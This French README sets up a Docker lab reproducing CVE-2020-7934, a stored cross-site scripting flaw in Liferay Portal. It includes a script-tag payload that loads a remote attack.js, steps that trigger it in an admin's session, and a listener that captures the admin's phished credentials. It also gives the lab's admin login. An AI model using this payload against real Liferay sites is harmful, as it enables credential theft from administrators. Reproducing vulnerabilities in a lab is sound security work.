CVE 2020-7934
Prérequis
- docker
Remarques
Il est possible de mettre le script d'attaque en ligne (via le code js) http://yourjavascript.com/
Notre script Js en ligne pour l'attaque
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Commandes de configuration
- allez dans le dossier racine de ce projet
- exécutez « sudo docker-compose up --build »
- nouveau terminal : exécutez « docker inspect liferay » ==> et copiez la valeur IPAddress
- nouveau terminal : exécutez « python api_attacker.py »
- ouvrez un navigateur et allez sur « http://IPAddress:8080 » ==> vous devriez obtenir le portail liferay en réponse
- pour arrêter et supprimer les conteneurs, utilisez « sudo docker-compose rm »
Instructions pour l'attaque
- Inscrivez-vous dans liferay en tant qu'utilisateur, connectez-vous, et dans la section « sites disponibles », rejoignez le site « liferay ».
- Modifiez le « nom de famille » dans un script JS (directement () ou via un « src = » http ... "")
- Connectez-vous en tant qu'admin liferay (nom d'utilisateur : [email protected], mot de passe : test)
- Allez dans les sites disponibles et cliquez sur « liferay », la page publique de ce site s'ouvrira.
- Allez sur la nouvelle page, un menu s'ouvrira sur la droite, cliquez sur mermbership.
- Sélectionnez l'utilisateur enregistré à l'étape 1. À ce moment, le script sera exécuté.
5.1) Dans le script attack.js, la page demandera les identifiants.
- Dans le terminal de l'étape 5 (des Commandes de configuration), le nom d'utilisateur/mot de passe saisi en 5.1 (par l'admin) )